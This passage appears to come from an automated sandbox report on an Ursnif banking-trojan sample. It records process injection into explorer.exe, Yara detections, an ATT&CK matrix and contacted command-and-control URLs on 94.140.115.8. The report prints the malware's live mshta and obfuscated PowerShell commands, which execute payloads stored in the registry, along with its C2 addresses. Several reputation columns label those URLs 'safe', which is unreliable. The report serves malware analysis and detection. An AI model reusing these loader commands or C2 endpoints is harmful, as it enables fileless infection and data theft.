                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF772CE12E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 40A000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFF424A1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2700000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFF424A1580
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 400000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFF424A1580
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 2890000
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFF424A1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFF424A1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFF424A1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFF424A1580 protect: page execute and read and write
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3688 base: 40A000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3688 base: 7FFF424A1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3688 base: 2700000 value: 80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3688 base: 7FFF424A1580 value: 40
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3688 base: 400000 value: 00
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3688 base: 7FFF424A1580 value: EB
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3688 base: 2890000 value: 80
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 5008
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3688
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3688
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4ECA.tmp" "c:\Users\user\AppData\Local\Temp\pyir2nwc\CSC3492E89F885A4D28ABE1C8363667B7D.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B2B.tmp" "c:\Users\user\AppData\Local\Temp\vx43imot\CSCE0D7D73128344F6AB96E56EC2E032.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 0000001B.00000000.605882278.000000000081C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.613116153.00000000058B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.558725783.000000000081C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000001B.00000000.558386775.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.584316532.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.585179509.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 0000001B.00000000.585179509.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.573585959.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.560028015.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 0000001B.00000000.585179509.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.573585959.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.560028015.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF3365 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF76BB GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF3365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F81F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF6D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000004.00000003.424373972.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424240322.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475301685.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424606218.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.472906954.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424163423.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424658030.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424644302.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424536633.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.476686328.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424457867.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3340, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5008, type: MEMORYSTR
                      Source: Yara matchFile source: 4.2.rundll32.exe.ef0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.48e94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.48e94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4dca4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4dca4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4e76b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4e494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.601015727.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.543939686.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.599055996.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.542346452.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.599465657.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475223060.0000000004DCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.544562349.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475254135.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000004.00000003.424373972.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424240322.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475301685.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424606218.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.472906954.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424163423.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424658030.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424644302.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424536633.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.476686328.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424457867.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3340, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5008, type: MEMORYSTR
                      Source: Yara matchFile source: 4.2.rundll32.exe.ef0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.48e94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.48e94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4dca4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4dca4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4e76b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4e494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.601015727.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.543939686.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.599055996.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.542346452.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.599465657.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475223060.0000000004DCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.544562349.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475254135.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      1
                      Valid Accounts                      		1
                      Windows Management Instrumentation                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Obfuscated Files or Information                      		1
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts2
                      Native API                      		Boot or Logon Initialization Scripts1
                      Access Token Manipulation                      		1
                      File Deletion                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)813
                      Process Injection                      		1
                      Masquerading                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Input Capture                      		Automated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Valid Accounts                      		NTDS25
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Access Token Manipulation                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials11
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items813
                      Process Injection                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32                      		Proc Filesystem3
                      Process Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery                      		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 617386 Sample: 626a97fea05c8.pdf.dll Startdate: 28/04/2022 Architecture: WINDOWS Score: 100 64 Snort IDS alert for network traffic 2->64 66 Found malware configuration 2->66 68 Yara detected  Ursnif 2->68 70 9 other signatures 2->70 11 loaddll32.exe 1 2->11         started        13 mshta.exe 19 2->13         started        process3 process4 15 cmd.exe 1 11->15         started        17 powershell.exe 33 13->17         started        signatures5 20 rundll32.exe 1 6 15->20         started        56 Injects code into the Windows Explorer (explorer.exe) 17->56 58 Writes to foreign memory regions 17->58 60 Modifies the context of a thread in another process (thread injection) 17->60 62 2 other signatures 17->62 24 csc.exe 3 17->24         started        27 csc.exe 3 17->27         started        29 conhost.exe 17->29         started        process6 dnsIp7 54 94.140.115.8, 49750, 80 NANO-ASLV Latvia 20->54 72 System process connects to network (likely due to code injection or exploit) 20->72 74 Writes to foreign memory regions 20->74 76 Allocates memory in foreign processes 20->76 78 3 other signatures 20->78 31 control.exe 20->31         started        50 C:\Users\user\AppData\Local\...\vx43imot.dll, PE32 24->50 dropped 34 cvtres.exe 1 24->34         started        52 C:\Users\user\AppData\Local\...\pyir2nwc.dll, PE32 27->52 dropped 36 cvtres.exe 1 27->36         started        file8 signatures9 process10 signatures11 90 Changes memory attributes in foreign processes to executable or writable 31->90 92 Injects code into the Windows Explorer (explorer.exe) 31->92 94 Writes to foreign memory regions 31->94 96 4 other signatures 31->96 38 explorer.exe 1 3 31->38 injected process12 signatures13 80 Self deletion via cmd delete 38->80 82 Disables SPDY (HTTP compression, likely to perform web injects) 38->82 84 Creates a thread in another existing process (thread injection) 38->84 41 cmd.exe 1 38->41         started        44 RuntimeBroker.exe 38->44 injected process14 signatures15 86 Uses ping.exe to sleep 41->86 88 Uses ping.exe to check the status of other devices and networks 41->88 46 conhost.exe 41->46         started        48 PING.EXE 1 41->48         started        process16

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      626a97fea05c8.pdf.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      4.2.rundll32.exe.ef0000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://94.140.115.8/drew/NiEEiC_2F3/2h7kr_2B2M1EBpHcH/ENyHLalFXmOl/_2FTW0ecUVe/3N7nldlK89kw4y/VYeID70%Avira URL Cloudsafe
                      http://94.140.115.8/drew/LtgGoR4W/2VkXik7fjDcVktkLvg4IApw/X92UzCdVgy/XGxL6WnODxABmAmav/eQYJObhAwpfD/VdmVLoyMEHz/dwiltyOKA4QHrd/HIJmqKTpq7hYAhh7xdD_2/BebjcoubFQh657nc/ksw26clyZ6v7ljU/oLbDPDTt1qYXqZfF_2/Fct2ocSBw/YaWKTOq17vIwu56czhmj/mDU1dku9eqq5aKu5F_2/FjqClysn2ko_2Fsx8SaFZF/ugZkpFnnMo_2B/poGcHSuZrc7hSygj/D8.jlk0%Avira URL Cloudsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://94.140.115.8/drew/lAbS1TW8Ry8K_2Fy_2F02/IsWfDHUCh87tGSw4/6lgCxLe1Qs4WPGx/DknDiIGwAkcSSAjTq_/2BfvJx7dx/1hlTGDAg0PRAb8RWrNXa/OnwJqcZ0UkVEA4nNNEX/rU_2BEpbIQ3L_2FTXhvUWT/8ZfWEtxix63AY/iFey05B2/gKLIqEyGvdF_2FQqfOcIngQ/d4nr47OKVK/s16bIA5z3PH2z3706/OF3C_2BAmDzq/p9S3fF0IaVA/8GI4MffuRsVQDp/0oN_2BdvJJV7wESzGZsla/_2FLi.jlk0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://94.140.115.8/drew/NiEEiC_2F3/2h7kr_2B2M1EBpHcH/ENyHLalFXmOl/_2FTW0ecUVe/3N7nldlK89kw4y/VYeID7sRLB3A_2FAgFg0G/a5El_2BO7WD36Nlp/el4uE7tHR4Z8M9p/QG4TJaEWODl3HaYCH4/kP01txLgC/1iGXgYXBwcTcIgoIP92G/0JSXT0rNb0xnVvZFyXY/gCk_2F7aTYUhOqcRrdrBn4/EZOQnHcHRUgv3/B5BfYkj9/KpyjZ64W8U3keBpCjw85kZ4/8t_2Bri7RNBUNE3Y/8jsFDn.jlk0%Avira URL Cloudsafe
                      http://94.140.115.8/370%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
                      http://94.140.115.8/drew/lAbS1TW8Ry8K_2Fy_2F02/IsWfDHUCh87tGSw4/6lgCxLe1Qs4WPGx/DknDiIGwAkcSSAjTq_/20%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://94.140.115.8/drew/LtgGoR4W/2VkXik7fjDcVktkLvg4IApw/X92UzCdVgy/XGxL6WnODxABmAmav/eQYJObhAwpfD/VdmVLoyMEHz/dwiltyOKA4QHrd/HIJmqKTpq7hYAhh7xdD_2/BebjcoubFQh657nc/ksw26clyZ6v7ljU/oLbDPDTt1qYXqZfF_2/Fct2ocSBw/YaWKTOq17vIwu56czhmj/mDU1dku9eqq5aKu5F_2/FjqClysn2ko_2Fsx8SaFZF/ugZkpFnnMo_2B/poGcHSuZrc7hSygj/D8.jlktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://94.140.115.8/drew/lAbS1TW8Ry8K_2Fy_2F02/IsWfDHUCh87tGSw4/6lgCxLe1Qs4WPGx/DknDiIGwAkcSSAjTq_/2BfvJx7dx/1hlTGDAg0PRAb8RWrNXa/OnwJqcZ0UkVEA4nNNEX/rU_2BEpbIQ3L_2FTXhvUWT/8ZfWEtxix63AY/iFey05B2/gKLIqEyGvdF_2FQqfOcIngQ/d4nr47OKVK/s16bIA5z3PH2z3706/OF3C_2BAmDzq/p9S3fF0IaVA/8GI4MffuRsVQDp/0oN_2BdvJJV7wESzGZsla/_2FLi.jlktrue
                      • Avira URL Cloud: safe
                      		unknown
